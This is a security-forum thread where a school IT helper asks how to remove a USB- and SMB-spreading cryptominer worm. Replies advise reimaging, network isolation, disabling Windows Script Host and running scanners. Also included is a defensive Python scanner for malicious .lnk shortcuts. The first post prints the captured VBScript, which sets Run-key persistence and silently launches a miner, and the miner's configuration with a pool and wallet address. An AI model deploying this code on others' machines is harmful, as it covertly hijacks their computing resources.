Disinfecting multiple PCs at school infected with unknown malware

ttomovcik

Level 1
Thread author
Verified
Oct 30, 2016
17
Hi. I've been trying to clean our school PCs (~90 workstations + 30 laptops) and so far 20 are cleaned. But the problem is that the infection still appears again after a few days. This is what I know about the infection:

I'm sorry, but I was unable to get any checksums of these files, nor the files themselves, except those listed in the "File contents" spoiler.

Code:
WindowsSearchIndexer
AddTask.vbs
Start.vbs
minerd.exe
cpuminer.exe

Code:
Spreads over infected usb files and smb shares

Code:
Once the machine is infected, the malware creates shortcuts of original files on USB and sets the shortcut to VBScript which will infect more machines

What is weird for me is that they are running ESET Endpoint Security, which looks like it allows the file to run, but when I access %Appdata% it picks it up as generic malware and quarantines it.

My question is: how can I quickly remove this infection, and what is this malware?

Code:
ON ERROR RESUME NEXT
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")

checkIn=DateSerial(2017,04,2)
checkOut=DateSerial(2017,04,08)
testMe=Now
If testMe > checkIn And testMe < checkOut Then
ON ERROR RESUME NEXT
shellobj.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemSvchostAssistants", chr(34) & "wscript %APPDATA%\addtask.vbs" & chr(34), "REG_SZ"
shellobj.Run"taskkill /f /im minerd.exe", 0, false
shellobj.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
wscript.sleep 6000
shellobj.Run shellobj.CurrentDirectory & "\xmr-stak-cpu.exe", 0, false
Else
ON ERROR RESUME NEXT
    shellobj.regdelete "HKCU\software\microsoft\windows\currentversion\run\SystemSvchostAssistants"
    shellobj.Run"taskkill /f /im minerd.exe", 0, false
    shellobj.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
    'filesystemobj.deletefile(wscript.scriptfullname)
    'wscript.quit
End If

Code:
/*
 * Number of threads. You can configure them below. Cryptonight uses 2MB of memory, so the optimal setting
 * here is the size of your L3 cache divided by 2. Intel mid-to-high end desktop processors have 2MB of L3
 * cache per physical core. Low end cpus can have 1.5 or 1 MB while Xeons can have 2, 2.5 or 3MB per core.
 */
"cpu_thread_num" : 8,

/*
 * Thread configuration for each thread. Make sure it matches the number above.
 * low_power_mode - This mode will double the cache usage, and double the single thread performance. It will
 *                  consume much less power (as less cores are working), but will max out at around 80-85% of
 *                  the maximum performance.
 *
 * no_prefetch -    This mode meant for large pages only. It will generate an error if running on slow memory
 *                  Some systems can gain up to an extra 5% here, but sometimes it will have no difference or make
 *                  things slower.
 *
 * affine_to_cpu -  This can be either false (no affinity), or the CPU core number. Note that on hyperthreading
 *                  systems it is better to assign threads to physical cores. On Windows this usually means selecting
 *                  even or odd numbered cpu numbers. For Linux it will be usually the lower CPU numbers, so for a 4
 *                  physical core CPU you should select cpu numbers 0-3.
 *
 */
"cpu_threads_conf" : [
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 0 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 1 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 2 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 3 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 4 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 5 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 6 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 7 },
],

/*
 * LARGE PAGE SUPPORT
 * Large pages need a properly set up OS. It can be difficult if you are not used to systems administration,
 * but the performance results are worth the trouble - you will get around 20% boost. Slow memory mode is
 * meant as a backup, you won't get stellar results there. If you are running into trouble, especially
 * on Windows, please read the common issues in the README.
 *
 * By default we will try to allocate large pages. This means you need to "Run As Administrator" on Windows.
 * You need to edit your system's group policies to enable locking large pages. Here are the steps from MSDN
 *
 * 1. On the Start menu, click Run. In the Open box, type gpedit.msc.
 * 2. On the Local Group Policy Editor console, expand Computer Configuration, and then expand Windows Settings.
 * 3. Expand Security Settings, and then expand Local Policies.
 * 4. Select the User Rights Assignment folder.
 * 5. The policies will be displayed in the details pane.
 * 6. In the pane, double-click Lock pages in memory.
 * 7. In the Local Security Setting – Lock pages in memory dialog box, click Add User or Group.
 * 8. In the Select Users, Service Accounts, or Groups dialog box, add an account that you will run the miner on
 * 9. Reboot for change to take effect.
 *
 * Windows also tends to fragment memory a lot. If you are running on a system with 4-8GB of RAM you might need
 * to switch off all the auto-start applications and reboot to have a large enough chunk of contiguous memory.
 *
 * On Linux you will need to configure large page support "sudo sysctl -w vm.nr_hugepages=128" and increase your
 * ulimit -l. To do this you need to add the following lines to /etc/security/limits.conf - "* soft memlock 262144"
 * and "* hard memlock 262144". You can also do it Windows-style and simply run-as-root, but this is NOT
 * recommended for security reasons.
 *
 * Memory locking means that the kernel can't swap out the page to disk - something that is unlikely to happen on a
 * command line system that isn't starved of memory. I haven't observed any difference on a CLI Linux system between
 * locked and unlocked memory. If that is your setup see option "no_mlck".
 */

/*
 * use_slow_memory defines our behaviour with regards to large pages. There are three possible options here:
 * always  - Don't even try to use large pages. Always use slow memory.
 * warn    - We will try to use large pages, but fall back to slow memory if that fails.
 * no_mlck - This option is only relevant on Linux, where we can use large pages without locking memory.
 *           It will never use slow memory, but it won't attempt to mlock
 * never   - If we fail to allocate large pages we will print an error and exit.
 */
"use_slow_memory" : "warn",

/*
 * NiceHash mode
 * nicehash_nonce - Limit the nonce to 3 bytes as required by nicehash. This cuts all the safety margins, and
 *                  if a block isn't found within 30 minutes then you might run into nonce collisions. Number
 *                  of threads in this mode is hard-limited to 32.
 */
"nicehash_nonce" : true,

/*
 * pool_address   - Pool address should be in the form "pool.supportxmr.com:3333". Only stratum pools are supported.
 * wallet_address - Your wallet, or pool login.
 * pool_password  - Can be empty in most cases or "x".
 */
"pool_address" : "cryptonight.eu.nicehash.com:3355",
"wallet_address" : "37LLjdYJUsU4CB64VENm1cjeXKga9jQtg7.w1",
"pool_password" : "x",

/*
 * Network timeouts.
 * Because of the way this client is written it doesn't need to constantly talk (keep-alive) to the server to make
 * sure it is there. We detect a buggy / overloaded server by the call timeout. The default values will be ok for
 * nearly all cases. If they aren't the pool has most likely overload issues. Low call timeout values are preferable -
 * long timeouts mean that we waste hashes on potentially stale jobs. Connection report will tell you how long the
 * server usually takes to process our calls.
 *
 * call_timeout - How long should we wait for a response from the server before we assume it is dead and drop the connection.
 * retry_time    - How long should we wait before another connection attempt.
 *                Both values are in seconds.
 */
"call_timeout" : 60,
"retry_time" : 10,

/*
 * Output control.
 * Since most people are used to miners printing all the time, that's what we do by default too. This is suboptimal
 * really, since you cannot see errors under pages and pages of text and performance stats. Given that we have internal
 * performance monitors, there is very little reason to spew out pages of text instead of concise reports.
 * Press 'h' (hashrate), 'r' (results) or 'c' (connection) to print reports.
 *
 * verbose_level - 0 - Don't print anything.
 *                 1 - Print intro, connection event, disconnect event
 *                 2 - All of level 1, and new job (block) event if the difficulty is different from the last job
 *                 3 - All of level 1, and new job (block) event in all cases, result submission event.
 *                 4 - All of level 3, and automatic hashrate report printing
 */
"verbose_level" : 3,

/*
 * Automatic hashrate report
 *
 * h_print_time - How often, in seconds, should we print a hashrate report if verbose_level is set to 4.
 *                This option has no effect if verbose_level is not 4.
 */
"h_print_time" : 60,

/*
 * Built-in web server
 * I like checking my hashrate on my phone. Don't you?
 * Keep in mind that you will need to set up port forwarding on your router if you want to access it from
 * outside of your home network. Ports lower than 1024 on Linux systems will require root.
 *
 * httpd_port - Port we should listen on. Default, 0, will switch off the server.
 */
"httpd_port" : 0,

/*
 * prefer_ipv4 - IPv6 preference. If the host is available on both IPv4 and IPv6 net, which one should be chosen?
 *               This setting will only be needed in the 2020s. No need to worry about it now.
 */
"prefer_ipv4" : true,

Code:
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"taskkill /f /im minerd.exe", 0, false
WshShell.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
wscript.sleep 6000
WshShell.Run WshShell.CurrentDirectory & "\xmr-stak-cpu.exe", 0, false
 

Attachments

  • SB4-12_D77-IT-PC9_15.6.2017.pdf (1.7 MB)
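A small triage script for the USB spreading behaviour described in the post (an added example, not code from the original post or from the malware): it walks a mounted USB stick or share, parses the string fields of each .lnk file according to the public MS-SHLLINK layout, and flags shortcuts that launch a script host or a .vbs-style file instead of the document they are named after. The sample shortcut is constructed inline; the script-host and extension lists are assumptions, not indicators from the page.

```python
import os
import struct

HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80   # LinkFlags bits (MS-SHLLINK)
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon")]
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "cmd.exe")   # assumed watch list
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, paths, arguments) of a .lnk file."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                    # end of the fixed ShellLinkHeader
    if flags & HAS_ID_LIST:                     # skip LinkTargetIDList (size-prefixed)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # skip LinkInfo (size is its first dword)
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for bit, key in STRING_FIELDS:              # StringData entries appear in this order
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + width * count]
            fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + width * count
    return fields

def is_suspicious(fields: dict) -> bool:
    """Flag a shortcut whose target or arguments invoke a script host or a script file."""
    blob = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    return any(h in blob for h in SCRIPT_HOSTS) or any(e in blob for e in SCRIPT_EXTS)

def scan_root(root: str) -> list:
    """Walk a mounted USB stick or share and list the .lnk files that warrant a look."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(".lnk")):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if is_suspicious(parse_lnk(fh.read())):
                        hits.append(path)
            except (OSError, ValueError):       # unreadable or not really a shortcut
                continue
    return hits

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed sample: minimal unicode .lnk carrying only RelativePath and Arguments."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, 0x08 | 0x20 | IS_UNICODE).ljust(76, b"\x00")
    strings = (struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + b"".join(strings)
```

Real worm shortcuts usually carry the target in the ID list or LinkInfo as well, so treat a hit on the string fields as a reason to pull the file for analysis, not as proof by itself.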

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,342
Format, take an image, use software to freeze the computers so it restores the image on reboot. Cleaning them now will waste your time not only this time but every time.
 

Winter Soldier

Level 25
Verified
Top Poster
Well-known
Feb 13, 2017
1,486
It looks like a worm that connects to the HTTPD server and spreads itself via USB.
Not sure, but the sleep function could be used to hide its processes (like process hollowing), or to put itself into sleep mode (timer).
It would be interesting to upload the malware to an online malware analysis service to see the behavior, functions, imports, etc.
If the clients are LAN connected, the infection spread is easy.
No idea how to get rid of this infection because I am not a removal expert, but the above suggestions or possibly multi scan approach with Zemana, MalwareBytes, Norton Power Eraser may be useful.
 

TheMalwareMaster

Level 21
Verified
Honorary Member
Top Poster
Well-known
Jan 4, 2016
1,022
Go with @SHvFl's advice and if you can't, then go with @Vasudev's.
Just a question why not contact ESET directly? Here is the link. I am sure they can help.
That's what I was about to say. They should offer support for endpoint customers. Have you tried making a malware submission to ESET, sending them the undetected files?
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,711
You can go through a strict malware removal process for 90 PCs with no 100% guarantee it will be gone, or you can use @SHvFl's counsel and reinstall on all the PCs.

If you have to reinstall, you may want to get lists of installed software for each and then grab all the documents/pics/etc. from each->create a folder for each PC with the list of programs and then place a folder in the folder for files. This is if it's even safe to use USB removable drives to do so. :(

First time I ever thought about how much work this really is to do for this many PCs. Offline backup once a month looks pretty convenient in comparison o_O. For sure as mentioned ESET should be able to offer good advice. Maybe they can determine the problem and provide a removal/cleaning option.
 

RoboMan

Level 34
Verified
Top Poster
Content Creator
Well-known
Jun 24, 2016
2,399
To start with, you should unlink all computers from the school home/corporate network they're in. They're pretty much connected with each other, which would make individual cleaning impossible. As well, after that, disable Windows Script Host on all machines to avoid execution of scripts (like VBScript and JScript) that rely on WSH.

After that, you may proceed to clean them up, and hopefully you can do it. You have a few tools here: Free Security Tools Collection
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,711
@RoboMan, I was going to go there but started thinking about cleaning up 120 PCs lol :eek:. @SHvFl's method started sounding better :D

Disabling script hosts for 120 PCs and then x 2-3 scans each and removal. WOW. And then no guarantees it will not spread again once back online...:(

I would love to have a crack at one of them...120...Uh maybe not...
 

RoboMan

Level 34
Verified
Top Poster
Content Creator
Well-known
Jun 24, 2016
2,399
LOL that's why you work as a School IT guy :cool:
Of course, the method you mention (@SHvFl's) is much simpler and more effective. I just mentioned mine in case format is not an option. :)
 

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,342
Even if we ignore the infection atm, not setting up a system like I said will eventually bite you on your ass. Eventually you will be hit by ransomware or, worse, a keylogger.
Shared PCs have to restore on reboot or else you are asking for trouble.
 

WolfensteinXeen

WHAT YOU NEED TO KNOW BEFORE PROCEEDING:

- All the solutions I've provided below can be done for free (either the software is free or you can use the free trial).

- The ideal would be to have a professional fix those computers and reinforce the security of your network. But since you're asking, I'm guessing that's not an option (maybe the school budget is tight, or another reason).

- You'll have to accept the fact that cleaning around 120 computers will take some time and that you won't be able to do it alone (not quickly anyway). You'll have to ask for the help of some friends, preferably ones that are tech savvy. Also you need to ask for your school principal's approval, as I doubt he/she would be happy with you messing around with the entire school network without knowing (I'm just saying that so that you won't end up in trouble).

- You could either clean all those PCs at once with the help of some friends (you should be at least 10), or a few at a time. Whatever you choose, I would recommend keeping the uninfected computers physically offline (as in with the Ethernet cable disconnected and the Wi-Fi disabled) until the entire network is clean, to avoid reinfection.

REMOVING MALWARE FROM THE COMPUTERS:

- 1: Update the database of ESET Endpoint Security and run a full system scan. This is the most basic but first thing to do.
- 2: Use a bootable antivirus to clean up the malware. This can remove some malware that can't be detected while Windows is running. Bitdefender Rescue CD and Kaspersky Rescue Disk are both good choices and include detailed information on how to set them up on CD or USB.
- 3: Scan the computers with HitmanPro and Zemana (keep real-time protection on and don't uninstall those yet; you'll know why below). These remove more traditional malware.
- 4: Scan the computers with Malwarebytes and AdwCleaner. These remove some malware that is missed by other AVs, as well as PUPs and PUAs.
- 5: Scan the computers with Norton Power Eraser. This tool is one of the best for removing hard-to-detect malware.

Once this is done, you have to keep in mind that ESET Endpoint Security wasn't able to protect your school's network, therefore the infection could occur again even if you think all computers have been cleaned.

PREVENTING COMPUTERS AND THE NETWORK FROM BEING INFECTED AGAIN:

- 1: I would suggest keeping Malwarebytes Premium or Zemana with real-time protection on (only one, not both, as they could conflict with each other) for the duration of the free trial (15 days for Malwarebytes, 30 days for Zemana). This is why I advised you not to uninstall those, as you would lose the trial upon uninstallation. Also, even after the trial is over, Malwarebytes and Zemana will revert to a free version and can still be used as second-opinion scanners, so you should keep both.
- 2: You could immunize the systems to prevent further infections. Spybot Free provides a good immunization tool that's fairly easy to use. While the efficiency of immunization is subject to debate, it's worth a shot.
- 3: You could use Norton ConnectSafe to protect the network. You could set it up on each computer or on the school's network. This will also provide an extra layer of protection at the only cost of the occasional slowdown.

I hope this will help you get your school's network clean again. Good luck ;)
 

roger_m

Level 41
Verified
Top Poster
Content Creator
Dec 4, 2014
3,014
If you want to continue with trying to remove the malware, rather than reformatting, I recommend doing scans with Zemana AntiMalware and Malwarebytes, as they are both very good at finding infections.
 
